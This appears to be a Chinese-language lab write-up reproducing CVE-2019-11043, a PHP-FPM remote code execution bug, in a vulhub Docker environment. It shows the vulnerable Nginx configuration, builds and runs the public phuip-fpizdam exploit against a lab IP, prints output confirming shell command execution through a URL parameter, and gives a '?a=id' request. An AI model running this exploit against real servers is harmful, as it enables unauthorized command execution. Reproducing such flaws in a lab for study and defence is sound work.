0%

CVE-2019-11043 PHP-FPM RCE

进入正文

漏洞描述

Nginx中的fastcgi_split_path_info字段被配置为 ^(.+?\.php)(/.*)$时,可以使用换行(%0a)绕过这个正则表达式。

环境

Nginx + php-fpm

1
2
3
4
5
6
7
location ~ [^/]\.php(/|$) {
...
fastcgi_split_path_info ^(.+?\.php)(/.*)$;
fastcgi_param PATH_INFO $fastcgi_path_info;
fastcgi_pass php:9000;
...
}

这里使用vulhub环境

进入php/CVE-2019-11043后

1
docker-compose up -d

工具准备

https://github.com/neex/phuip-fpizdam,clone到本地,然后进行编译

1
go build

这个时候在phuip-fpizdam目录下会生成一个可执行文件。

执行

1
phuip-fpizdam.exe "http://192.168.136.128:9088/index.php"
1
2
3
4
5
6
7
8
9
10
2019/10/25 16:03:51 Base status code is 200
2019/10/25 16:03:52 Status code 502 for qsl=1795, adding as a candidate
2019/10/25 16:03:52 The target is probably vulnerable. Possible QSLs: [1785 1790 1795]
2019/10/25 16:03:52 Attack params found: --qsl 1790 --pisos 146 --skip-detect
2019/10/25 16:03:52 Trying to set "session.auto_start=0"...
2019/10/25 16:03:52 Detect() returned attack params: --qsl 1790 --pisos 146 --skip-detect <-- REMEMBER THIS
2019/10/25 16:03:52 Performing attack using php.ini settings...
2019/10/25 16:03:52 Success! Was able to execute a command by appending "?a=/bin/sh+-c+'which+which'&" to URLs
2019/10/25 16:03:52 Trying to cleanup /tmp/a...
2019/10/25 16:03:52 Done!

访问http://192.168.136.128:8005/?a=id

Reference

https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043

https://bugs.php.net/bug.php?id=78599